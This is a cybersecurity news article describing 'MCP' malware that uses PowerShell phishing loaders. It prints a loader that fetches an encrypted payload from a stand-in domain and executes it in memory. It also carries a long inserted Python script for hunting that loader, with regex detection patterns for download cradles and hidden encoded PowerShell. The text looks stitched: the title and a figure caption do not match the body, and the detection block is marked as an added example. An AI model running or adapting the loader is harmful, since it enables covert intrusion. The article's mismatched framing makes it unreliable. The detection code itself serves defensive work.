New Attack Techniques Using MCP & How It Will be Used to Build Security Tools

A new attack technique known as Malicious Command Protocol (MCP) has surfaced in recent weeks and is raising concern among security professionals worldwide.

The technique abuses previously unexploited weaknesses in command-and-control (C2) infrastructure, letting attackers keep a persistent connection to compromised hosts while evading traditional detection.

Security researchers have seen MCP attacks aimed mainly at financial institutions and critical infrastructure, and the malware's ability to bypass conventional security controls makes it particularly dangerous.


MCP's attack chain is notably versatile. It begins with specially crafted phishing emails that carry seemingly legitimate PowerShell scripts.

Figure: Edit Tool (Source – Tenable)

Once executed, these scripts establish an encrypted channel to attacker-controlled servers using a technique called "protocol tunneling", which disguises the malicious traffic as legitimate API calls.

This initial infection stage is remarkably stealthy: it runs entirely in memory and leaves minimal forensic evidence on the compromised system.

Tenable researchers identified the malware during routine threat hunting when they noticed unusual API calls to cloud services coming from several client environments.

Detailed analysis showed that MCP's command structure mimics legitimate administrative tools, which lets it operate below the radar of many security monitoring solutions.

“What makes MCP particularly concerning is its ability to adapt its communication patterns based on the environment it infects,” noted the lead Tenable analyst in their initial report.

The impact of MCP has already been substantial: at least three major financial institutions have reported data exfiltration incidents linked to the malware.

Infected organizations have experienced long periods of undetected compromise, with attackers keeping access for an average of 47 days before discovery.

The economic impact of these breaches is still being assessed, but early estimates put remediation costs above $2.3 million per incident.

Interestingly, the security community is already building countermeasures on MCP's own techniques.

The protocol mechanisms that make MCP effective are being repurposed into more robust detection systems that can identify similar attack patterns in the future.

MCP Infection Mechanism Deep Dive

The infection starts when a user runs what appears to be a benign PowerShell script. Below is a simplified version of the initial loader, with comments:

# Fetch the encrypted payload (expected: the hex output of ConvertFrom-SecureString -Key)
$s = New-Object System.Net.WebClient
$c = $s.DownloadString('https://legitimate-looking-domain.com/api/config')
# Derive a 32-byte AES key from host values; ConvertTo-SecureString -Key needs 16, 24 or 32 bytes, so hash them with SHA-256
$k = [System.Security.Cryptography.SHA256]::Create().ComputeHash([System.Text.Encoding]::UTF8.GetBytes($env:COMPUTERNAME + $env:USERNAME))
$d = ConvertTo-SecureString $c -Key $k
# Unwrap the SecureString to plain text and run it in memory (nothing is written to disk)
iex ([System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($d)))

This deceptively simple code downloads an encrypted payload, derives the AES decryption key from host-specific values (the computer name and user name, hashed to the 32-byte length ConvertTo-SecureString -Key requires), and runs the decrypted commands directly in memory. Because the key is host-bound, a payload captured from one victim cannot be decrypted in a sandbox with a different hostname and username, which complicates analysis.

What makes this approach effective is that it leaves no malware binary on disk for traditional antivirus to detect. It is not invisible, though: on PowerShell 5 and later, Script Block Logging (Event ID 4104) records the decrypted script when Invoke-Expression runs it, and AMSI submits that content to the installed engine before execution, so defenders with those controls enabled still get a copy of the second stage.

The malware then establishes persistence with scheduled tasks whose names and locations look like legitimate system maintenance operations.
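The loader traits above (download cradle, host-bound key, SecureString unwrap, in-memory Invoke-Expression) and the maintenance-lookalike scheduled task both leave telemetry that can be hunted. The following is an added example, not the article's or Tenable's code: it scores constructed Script Block Logging text (Event ID 4104 ScriptBlockText) against those traits and flags scheduled tasks whose action is PowerShell launched hidden or with an encoded command. The indicator names, weights, alert threshold, host names, task paths and the encoded-command string are all this example's own assumptions.

```python
"""Hunt for the MCP-style loader in PowerShell script-block logs and for its
task-based persistence. Added example, not the article's or Tenable's code:
indicator names, weights and the threshold are this example's own assumptions,
and all input below is constructed, not real telemetry."""
import re

# Constructed sample of Script Block Logging (Event ID 4104) ScriptBlockText.
# Entry 1 is the loader from the article; 2 and 3 are benign admin activity.
SCRIPT_BLOCKS = [
    {"id": 1, "host": "FIN-WS-042", "user": "j.doe", "text": "\n".join([
        "$s = New-Object System.Net.WebClient",
        "$c = $s.DownloadString('https://legitimate-looking-domain.com/api/config')",
        "$k = [System.Text.Encoding]::UTF8.GetBytes($env:COMPUTERNAME + $env:USERNAME)",
        "$d = ConvertTo-SecureString $c -Key $k",
        "iex ([System.Runtime.InteropServices.Marshal]::PtrToStringAuto("
        "[System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($d)))"])},
    {"id": 2, "host": "FIN-WS-007", "user": "admin", "text":
        "Get-ChildItem C:\\Logs -Filter *.log | Where-Object LastWriteTime -lt "
        "(Get-Date).AddDays(-30) | Remove-Item"},
    {"id": 3, "host": "FIN-WS-019", "user": "svc_backup", "text":
        "Invoke-WebRequest https://updates.example.net/app.json | ConvertFrom-Json"},
]

# Constructed scheduled-task inventory (the fields Get-ScheduledTask would give you).
# The first task hides under the Microsoft\Windows tree but runs hidden, encoded PowerShell.
SCHEDULED_TASKS = [
    {"path": r"\Microsoft\Windows\Maintenance\SystemHealthCheck",
     "action": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "args": "-nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"path": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "action": r"%windir%\system32\defrag.exe", "args": "-c -h -o -$"},
    {"path": r"\Backup\NightlyExport",
     "action": "powershell.exe", "args": r"-File C:\Scripts\export.ps1"},
]

# Loader traits from the article, each with an assumed weight. A lone download
# cradle is normal admin work; the combination is what should fire.
SCRIPT_INDICATORS = {
    "download_cradle": (re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Invoke-RestMethod", re.I), 2),
    "dynamic_exec": (re.compile(r"\biex\b|Invoke-Expression", re.I), 3),
    "securestring_unwrap": (re.compile(r"SecureStringToBSTR|PtrToStringAuto", re.I), 2),
    "host_bound_key": (re.compile(r"-Key\s+\$\w+|\$env:COMPUTERNAME", re.I), 2),
}
ALERT_THRESHOLD = 5  # assumed: at least a cradle plus dynamic execution


def score_script_block(text):
    """Return (score, matched indicator names) for one ScriptBlockText."""
    hits = [name for name, (rx, _) in SCRIPT_INDICATORS.items() if rx.search(text)]
    return sum(SCRIPT_INDICATORS[h][1] for h in hits), hits


def hunt_script_blocks(blocks, threshold=ALERT_THRESHOLD):
    """Return alert records for blocks whose score reaches the threshold."""
    alerts = []
    for b in blocks:
        score, hits = score_script_block(b["text"])
        if score >= threshold:
            alerts.append({"id": b["id"], "host": b["host"], "user": b["user"],
                           "score": score, "hits": hits})
    return alerts


POWERSHELL_EXE = re.compile(r"(^|\\)(powershell|pwsh)(\.exe)?$", re.I)
TASK_ARG_FLAGS = {
    "encoded_command": re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I),
    "hidden_window": re.compile(r"(^|\s)-w(indowstyle)?\s+hidden\b", re.I),
    "no_profile": re.compile(r"(^|\s)-nop(rofile)?\b", re.I),
    "download_or_iex": re.compile(r"DownloadString|Invoke-WebRequest|\biex\b|Invoke-Expression", re.I),
}
MS_TASK_ROOT = "\\microsoft\\windows\\"


def suspicious_task(task):
    """Return the reasons a scheduled task looks like loader persistence ([] if none)."""
    if not POWERSHELL_EXE.search(task["action"]):
        return []
    reasons = [n for n, rx in TASK_ARG_FLAGS.items() if rx.search(task["args"])]
    # A PowerShell action filed under the Microsoft\Windows tree is the
    # "looks like system maintenance" disguise the article describes.
    if reasons and task["path"].lower().startswith(MS_TASK_ROOT):
        reasons.append("powershell_under_microsoft_tree")
    return reasons


def hunt_tasks(tasks):
    """Return (task path, reasons) for every task with at least one reason."""
    return [(t["path"], r) for t in tasks if (r := suspicious_task(t))]


if __name__ == "__main__":
    for a in hunt_script_blocks(SCRIPT_BLOCKS):
        print(f"ALERT script block {a['id']} on {a['host']} ({a['user']}): score {a['score']} {a['hits']}")
    for path, reasons in hunt_tasks(SCHEDULED_TASKS):
        print(f"ALERT task {path}: {reasons}")
```

Run as-is it alerts on script block 1 (score 9, all four traits) and on the SystemHealthCheck task, and stays quiet on the log cleanup, the JSON fetch and the file-based backup task. In production you would feed `SCRIPT_BLOCKS` from the Microsoft-Windows-PowerShell/Operational channel and `SCHEDULED_TASKS` from an inventory export; the weighting matters because a download cradle on its own is routine, whereas a cradle plus SecureString unwrapping plus Invoke-Expression in one block is the loader's signature.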

The security industry's rapid response to MCP shows how defenses keep evolving: researchers are already folding elements of MCP's evasion techniques into next-generation security tools intended to give better protection against similar threats.


Tushar Subhra Dutta
Tushar is a cyber security content editor with a passion for creating captivating and informative content. With years of experience in cyber security, he covers cyber security news, technology and other news.